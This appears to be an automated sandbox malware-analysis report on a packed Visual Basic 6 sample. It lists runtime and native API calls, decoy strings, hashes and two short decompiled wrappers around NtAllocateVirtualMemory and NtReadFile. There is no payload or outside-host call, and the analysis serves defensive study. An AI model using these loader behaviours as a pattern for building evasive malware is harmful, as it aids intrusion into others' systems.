                  • API ID: __vba$Free$Move$CheckCopyHresult$CallLateListNew2_adj_fdiv_m64$#512#539#540#558#582#610#712#716Addref
                  • String ID: Brasiliansk$Environment$Item$NAVIGATIONSSKOLERNES$Nonincreasing1$PROCESS$PRODUKTUDVIKLER$Preludiet5$WINDIR$WScript.Shell$ctf
                  • API String ID: 4167868168-594783680
                  • Opcode ID: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
                  • Instruction ID: bdfed9ac7365b67e29146c59590f7b3a1cc87b8179bb4dd4a60cd4cce7d5f936
                  • Opcode Fuzzy Hash: 31f5f28bbb99dd9aeafd3fcf0aa9ad527ea1712a5f5c8e053d1ac5437fc3e3b4
                  • Instruction Fuzzy Hash: 43D12B75900209EBDB04DFA4DE89ADEBBB4FF48704F10816AF505B72A0DB746985CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaChkstk.MSVBVM60(?,00401326), ref: 004153AE
                  • #693.MSVBVM60(Digitalkamera,?,?,?,?,00401326), ref: 004153E1
                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401326), ref: 004153FA
                  • #578.MSVBVM60(Bfferne,?,?,?,?,00401326), ref: 0041540C
                  • #517.MSVBVM60(Scapularies,?,?,?,?,00401326), ref: 00415427
                  • __vbaStrMove.MSVBVM60(?,?,?,?,00401326), ref: 00415432
                  • #610.MSVBVM60(?,?,?,?,?,00401326), ref: 00415443
                  • #662.MSVBVM60(?,00402C74,?,00000002,00000001,00000001), ref: 0041546C
                  • #696.MSVBVM60(Formaliaernes9), ref: 00415477
                  • __vbaVarTstGt.MSVBVM60(00008002,?), ref: 00415499
                  • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 004154B4
                  • __vbaFPInt.MSVBVM60(?,?,?,00401326), ref: 004154D9
                  • #702.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 004154F5
                  • __vbaStrMove.MSVBVM60 ref: 00415500
                  • __vbaStrCopy.MSVBVM60 ref: 00415511
                  • __vbaFreeStr.MSVBVM60 ref: 0041551A
                  • __vbaFreeVar.MSVBVM60 ref: 00415523
                  • #608.MSVBVM60(00000004,00000052), ref: 00415536
                  • __vbaStrVarMove.MSVBVM60(00000004), ref: 00415540
                  • __vbaStrMove.MSVBVM60 ref: 0041554B
                  • __vbaFreeVar.MSVBVM60 ref: 00415554
                  • __vbaVarDup.MSVBVM60 ref: 0041557B
                  • #544.MSVBVM60(?,?), ref: 00415589
                  • __vbaVarTstGt.MSVBVM60(00008002,?), ref: 004155AE
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004155C5
                  • __vbaNew2.MSVBVM60(004029E8,0041746C,?,?,?,?,?,?,00401326), ref: 004155F7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029D8,00000014), ref: 0041565D
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000060), ref: 004156BA
                  • __vbaStrCopy.MSVBVM60 ref: 004156DE
                  • __vbaFreeStr.MSVBVM60 ref: 004156E7
                  • __vbaFreeObj.MSVBVM60 ref: 004156F0
                  • __vbaStrCat.MSVBVM60(Unregenerable1,?), ref: 0041570C
                  • __vbaStrMove.MSVBVM60 ref: 00415717
                  • __vbaStrCopy.MSVBVM60 ref: 00415728
                  • __vbaFreeStr.MSVBVM60 ref: 00415731
                  • __vbaFreeStr.MSVBVM60(0041578E), ref: 0041577E
                  • __vbaFreeStr.MSVBVM60 ref: 00415787
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$Copy$CheckHresultList$#517#544#578#608#610#662#693#696#702ChkstkErrorNew2
                  • String ID: 16:16:16$Bfferne$Digitalkamera$Formaliaernes9$Scapularies$Unregenerable1$ltA
                  • API String ID: 2918757743-1695909465
                  • Opcode ID: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
                  • Instruction ID: 3806a95896f8153a6f56456eff5a9f23e8b0e5f2b5942c0e8807afdb81e572b9
                  • Opcode Fuzzy Hash: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
                  • Instruction Fuzzy Hash: ADB10974900219EFDB14DFA0DE48BDDBBB4BF48705F1081A9E50AB72A0DB745A89CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60(?,660E6C30,660E1929), ref: 00414E68
                  • #709.MSVBVM60(Lionisables5,renummererer,000000FF,00000000), ref: 00414E7B
                  • #525.MSVBVM60(00000090), ref: 00414E8B
                  • __vbaStrMove.MSVBVM60 ref: 00414E9C
                  • #512.MSVBVM60(SIKSAKKENDES,00000063), ref: 00414EA5
                  • __vbaStrMove.MSVBVM60 ref: 00414EB0
                  • #523.MSVBVM60(valkeler), ref: 00414EBF
                  • __vbaStrMove.MSVBVM60 ref: 00414ECA
                  • #629.MSVBVM60(?,?,000000B4,?), ref: 00414EFB
                  • __vbaVarTstNe.MSVBVM60(?,?), ref: 00414F1D
                  • __vbaFreeStr.MSVBVM60 ref: 00414F2E
                  • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 00414F3E
                  • __vbaVarDup.MSVBVM60 ref: 00414F60
                  • #522.MSVBVM60(00000002,00000008), ref: 00414F6E
                  • __vbaStrVarMove.MSVBVM60(00000002), ref: 00414F78
                  • __vbaStrMove.MSVBVM60 ref: 00414F83
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,00000002), ref: 00414F8F
                  • #527.MSVBVM60(JURYLESS), ref: 00414F9D
                  • __vbaStrMove.MSVBVM60 ref: 00414FA8
                  • __vbaStrCopy.MSVBVM60 ref: 00414FB5
                  • __vbaFreeStr.MSVBVM60 ref: 00414FBE
                  • __vbaFreeStr.MSVBVM60(0041500E), ref: 00414FFC
                  • __vbaFreeStr.MSVBVM60 ref: 00415001
                  • __vbaFreeStr.MSVBVM60 ref: 00415006
                  • __vbaFreeStr.MSVBVM60 ref: 0041500B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$CopyList$#512#522#523#525#527#629#709
                  • String ID: JURYLESS$Lionisables5$PHONOCARDIOGRAMME$SIKSAKKENDES$Unstaggered6$renummererer$valkeler
                  • API String ID: 3254860574-4034370320
                  • Opcode ID: e9bc6fa72084d144f86e9d5d94420c95dfde6c69b37ad7a7c09cc1d475c80df4
                  • Instruction ID: b83fdf7733101d76648dd69ee11910e5551982623077cfcb5eb3fd358b6e6d10
                  • Opcode Fuzzy Hash: e9bc6fa72084d144f86e9d5d94420c95dfde6c69b37ad7a7c09cc1d475c80df4
                  • Instruction Fuzzy Hash: 2551E975D002499BDB04DFD4DD89ADEBFB8BF58300F10412AE506B72A0DBB41689CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • #652.MSVBVM60(?,?,66106831,660E6C30,660E1929), ref: 00414AF8
                  • __vbaVarTstEq.MSVBVM60(?,?), ref: 00414B14
                  • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00414B27
                  • #539.MSVBVM60(00000002,0000008F,00000086,00000007), ref: 00414B4B
                  • __vbaStrVarMove.MSVBVM60(00000002), ref: 00414B55
                  • __vbaStrMove.MSVBVM60 ref: 00414B5C
                  • __vbaStrCopy.MSVBVM60 ref: 00414B66
                  • __vbaFreeStr.MSVBVM60 ref: 00414B6F
                  • __vbaFreeVar.MSVBVM60 ref: 00414B74
                  • __vbaVarDup.MSVBVM60 ref: 00414B8E
                  • #666.MSVBVM60(?,00000002), ref: 00414B9C
                  • __vbaVarCat.MSVBVM60(?,00008008,?), ref: 00414BBC
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 00414BC3
                  • __vbaStrMove.MSVBVM60 ref: 00414BCA
                  • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000001,00000000), ref: 00414BD3
                  • __vbaFreeStr.MSVBVM60 ref: 00414BDC
                  • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,?), ref: 00414BEC
                  • #611.MSVBVM60 ref: 00414BF5
                  • __vbaStrMove.MSVBVM60 ref: 00414C00
                  • __vbaPut3.MSVBVM60(00000000,?,00000001), ref: 00414C0A
                  • __vbaFreeStr.MSVBVM60 ref: 00414C13
                  • __vbaFileClose.MSVBVM60(00000001), ref: 00414C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$Move$FileList$#539#611#652#666CloseCopyOpenPut3
                  • String ID: Rebukeful4$\TUN5jvHxLZYIkcVn6S8g8Zy7vgIRN6j34$tmp
                  • API String ID: 1642154090-2505050908
                  • Opcode ID: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
                  • Instruction ID: db7d2b6c2fd00e66f80999167363a440dad08cd3fdb0f31befbf95a8ee7b4795
                  • Opcode Fuzzy Hash: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
                  • Instruction Fuzzy Hash: C851EDB1D002099FDB04DFA4D948ADEBBB8FF48704F10C12AE616B72A0EB745549CF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$FreeMove$#520CopyList$ErrorOverflow
                  • String ID: GRADEREDE
                  • API String ID: 2203838927-682219593
                  • Opcode ID: 45b15a2fda6961a2d9578a2592590381a4175f4bcb62b224ec72ca802e860bae
                  • Instruction ID: 439dcb989c78c0bb19f891265363c32df97838b40bc21f39f376b841b869b029
                  • Opcode Fuzzy Hash: 45b15a2fda6961a2d9578a2592590381a4175f4bcb62b224ec72ca802e860bae
                  • Instruction Fuzzy Hash: B551EAB1D00209EFDB04DFA4D985ADEBFB8FF08740F14412AE506B6290E7745589CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 004157FF
                  • #598.MSVBVM60 ref: 00415801
                  • #519.MSVBVM60(KUVERTEN), ref: 0041580C
                  • __vbaStrMove.MSVBVM60 ref: 0041581D
                  • __vbaStrMove.MSVBVM60(000000F2,?), ref: 0041583F
                  • #631.MSVBVM60(00000000), ref: 00415842
                  • #528.MSVBVM60(?,?), ref: 0041585A
                  • #520.MSVBVM60(?,?), ref: 00415868
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00415872
                  • __vbaStrMove.MSVBVM60 ref: 0041587D
                  • __vbaStrCopy.MSVBVM60 ref: 0041588A
                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041589A
                  • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,?,?), ref: 004158B2
                  • __vbaFreeStr.MSVBVM60(004158FC), ref: 004158F5
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Move$Free$CopyList$#519#520#528#598#631
                  • String ID: 2$KUVERTEN
                  • API String ID: 860267153-160717622
                  • Opcode ID: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
                  • Instruction ID: 04481c4492307c2e4da7a75cfd4f4fa401a31a651229871e0efee2cbbbd0db22
                  • Opcode Fuzzy Hash: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
                  • Instruction Fuzzy Hash: 5F31D6B1C10229EFCB04DFD4DD89AEEBBB8FB58700F10412AE506B7660DB745649CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaVarDup.MSVBVM60(660E6BEC,660E6C30,660E1929), ref: 00414D03
                  • #607.MSVBVM60(?,00000064,?), ref: 00414D13
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00414D1D
                  • __vbaStrMove.MSVBVM60 ref: 00414D24
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414D30
                  • #709.MSVBVM60(Shammock6,Amerindians9,000000FF,00000000), ref: 00414D47
                  • #525.MSVBVM60(0000004C), ref: 00414D54
                  • __vbaStrMove.MSVBVM60 ref: 00414D5F
                  • #512.MSVBVM60(Eneboerskens,00000090), ref: 00414D6B
                  • __vbaStrMove.MSVBVM60 ref: 00414D76
                  • __vbaStrCopy.MSVBVM60 ref: 00414D7D
                  • __vbaFreeStr.MSVBVM60 ref: 00414D86
                  • #586.MSVBVM60(00000000,403B0000), ref: 00414D93
                  • __vbaFreeStr.MSVBVM60(00414DE6,660E6BEC,660E6C30,660E1929), ref: 00414DDE
                  • __vbaFreeStr.MSVBVM60 ref: 00414DE3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$FreeMove$#512#525#586#607#709CopyList
                  • String ID: Amerindians9$Eneboerskens$Shammock6
                  • API String ID: 1315283285-3851144993
                  • Opcode ID: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
                  • Instruction ID: 47d39b2c0a556e7bda706f640f223120ad4fb53459ba33679d4ace5d1b409952
                  • Opcode Fuzzy Hash: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
                  • Instruction Fuzzy Hash: C2315070E00209EFC714DFA4DA49BDEBBB4BB48300F10812AE516B36A0EB746545CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60(66106DF6,00000000,00000008), ref: 004160BD
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 004160D5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,0000004C), ref: 004160FA
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E68,00000028), ref: 0041611A
                  • __vbaFreeObj.MSVBVM60 ref: 00416123
                  • #610.MSVBVM60(?), ref: 0041612D
                  • #552.MSVBVM60(?,?,00000001), ref: 0041613D
                  • __vbaVarMove.MSVBVM60 ref: 0041614F
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041615F
                  • __vbaFreeStr.MSVBVM60(0041619D), ref: 00416196
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.507346221.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.507336336.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.507359665.0000000000417000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.507363672.0000000000419000.00000002.00020000.sdmp
                  Similarity
                  • API ID: __vba$Free$CheckHresult$#552#610CopyListMoveNew2
                  • String ID: (j
                  • API String ID: 3895108431-2984457235
                  • Opcode ID: 21b02cfadb8d0526b204535bbc5f1591e912534b628be68ed32a4ae9d93dde73
                  • Instruction ID: 77b8e8a7850380d043e43de55d9c99e89a055a8e14bda7d1310aa77c294e9cf0
                  • Opcode Fuzzy Hash: 21b02cfadb8d0526b204535bbc5f1591e912534b628be68ed32a4ae9d93dde73
                  • Instruction Fuzzy Hash: F3316C71D40205ABCB04DFA5DD49EEEBBB8EF58701F10802AF511B72A0D7786589CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                  • NtReadFile.NTDLL(b=A,?,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,?,00413D62,?,00000000), ref: 004186C5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: File$CreateRead
                  • String ID: !:A$b=A$b=A
                  • API String ID: 3388366904-704622139
                  • Opcode ID: 814bae435c4d82792ef654be701cc0bf7de2c70f1b5524ffde98051c99b7406a
                  • Instruction ID: fc5bea58bc1d9d3db1e11ac85c417a62abeaa590913897b2b5073321e61bf4b9
                  • Opcode Fuzzy Hash: 814bae435c4d82792ef654be701cc0bf7de2c70f1b5524ffde98051c99b7406a
                  • Instruction Fuzzy Hash: 3501F6B2200208ABDB18DF89DC85DEB77ADEF8C754F05824DFE4D93241CA34E8518BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                  				void* _t18;
                  				void* _t27;
                  				intOrPtr* _t28;
                  
                  				_t13 = _a4;
                  				_t28 = _a4 + 0xc48;
                  				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                  				_t4 =  &_a40; // 0x413a21
                  				_t6 =  &_a32; // 0x413d62
                  				_t12 =  &_a8; // 0x413d62
                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                  				return _t18;
                  			}







                  APIs
                  • NtReadFile.NTDLL(b=A,?,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,?,00413D62,?,00000000), ref: 004186C5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: FileRead
                  • String ID: !:A$b=A$b=A
                  • API String ID: 2738559852-704622139
                  • Opcode ID: 5397ea5bdd59cc439ae72b42f5519e86338832593f98dae6125b9265ee613aa8
                  • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                  • Opcode Fuzzy Hash: 5397ea5bdd59cc439ae72b42f5519e86338832593f98dae6125b9265ee613aa8
                  • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: 35466a62842d6c3d452dcbba01eb6370ba49b22441b4555bcc5dcbf436c76725
                  • Instruction ID: 4c8da8bb1c6e78fed2e5c14dbf6123a9eaa319d0ecd46a3b157b5a17b91797cb
                  • Opcode Fuzzy Hash: 35466a62842d6c3d452dcbba01eb6370ba49b22441b4555bcc5dcbf436c76725
                  • Instruction Fuzzy Hash: A6118EB05447149FE700CF20D94DFD67BA5AF1A7A5F168289AE511B0F6D7A88680CF12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00527A4F
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: f5d789059c493548bb127886e54eae194f6669bb69396ab2d37cfebb0b2e3ac3
                  • Instruction ID: 152f9315a974a119776be92b794e521584297c8946d0f70e24596938c74dd622
                  • Opcode Fuzzy Hash: f5d789059c493548bb127886e54eae194f6669bb69396ab2d37cfebb0b2e3ac3
                  • Instruction Fuzzy Hash: 751154B12003155FDB00DF789A89B8B3A29FF5A7E0F5543A6DD4A8B1E6E324D881C515
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00527A4F
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 2360741de48f358e568c5ef7b02216a56e211c38dbd11e700d373cea9d4e7b50
                  • Instruction ID: 16ea019150d93442f273581169ead6cfa937aa5b36361a47626e73187789b109
                  • Opcode Fuzzy Hash: 2360741de48f358e568c5ef7b02216a56e211c38dbd11e700d373cea9d4e7b50
                  • Instruction Fuzzy Hash: 9D1153B06003265FD710EF68C9C9B4B3A28FF8A3B0B5643AADC46970E6E720D881C615
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 844b699f726916c3da095aa0dd351c46a4ec63a69d9a8655cef342f3bdf9747e
                  • Instruction ID: c7c963e9c9ffe9ebc317613d403a0a3f01ad1047f461a56b469918a03c429eef
                  • Opcode Fuzzy Hash: 844b699f726916c3da095aa0dd351c46a4ec63a69d9a8655cef342f3bdf9747e
                  • Instruction Fuzzy Hash: 0501B6B2201208ABDB08CF88DC95DEB77E9AF8C754F158248FA1D97241C630EC51CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: c49b7080193a95fe0d5b7dc67530f3f9e889f126ac260e0010dfebc7febf0e48
                  • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                  • Opcode Fuzzy Hash: c49b7080193a95fe0d5b7dc67530f3f9e889f126ac260e0010dfebc7febf0e48
                  • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtProtectVirtualMemory.NTDLL(-0000101C,-00000018), ref: 00527B57
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 8c6f62ea7f4352498ad16fa9c96fafc6dd4e4a025d785a3fc410f4fd7699c526
                  • Instruction ID: fa41090c0fa323c07e33d7f7e6cef0e1d5ab89b42493eac22be38ec093e8a17d
                  • Opcode Fuzzy Hash: 8c6f62ea7f4352498ad16fa9c96fafc6dd4e4a025d785a3fc410f4fd7699c526
                  • Instruction Fuzzy Hash: E3F0B4B14457009FF7058E21DD0DBE677A5AF293B6F118288AC515B0F9D7B9C6808F52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
                  • Instruction ID: 3a37cc489ca2f65b9e5cd4cff20079687d9055bb82a6973eaac54395a5a57be9
                  • Opcode Fuzzy Hash: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
                  • Instruction Fuzzy Hash: 94F0D4B2604149AFCB14DFACD994DDB77AAEF8C300B148649FA8887205C631E8558BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004187AA(void* __eax, signed int __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                  				signed int _v117;
                  				long _t18;
                  				void* _t26;
                  
                  				_v117 = _v117 ^ __edx;
                  				_t14 = _a4;
                  				E004191D0(_t26, _a4, _a4 + 0xc60,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x30);
                  				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                  				return _t18;
                  			}







                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,?,00000000,00000000,00408B03), ref: 004187E9
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 6faa13729a203f040356a4449dcc7cabcbc04d02c878f7296972ef6c99afa063
                  • Instruction ID: fa62749528135fe0792dc5cc05633dbc6fea34fba145ebb65239203964924846
                  • Opcode Fuzzy Hash: 6faa13729a203f040356a4449dcc7cabcbc04d02c878f7296972ef6c99afa063
                  • Instruction Fuzzy Hash: 5AF01CB5200209BFDB14DF99CC85EEB7BA9AF88354F15824DFE0D97251C671E851CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                  				long _t14;
                  				void* _t21;
                  
                  				E004191D0(_t21, _a4, _a4 + 0xc60,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                  				return _t14;
                  			}






                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,?,00000000,00000000,00408B03), ref: 004187E9
                  Memory Dump Source
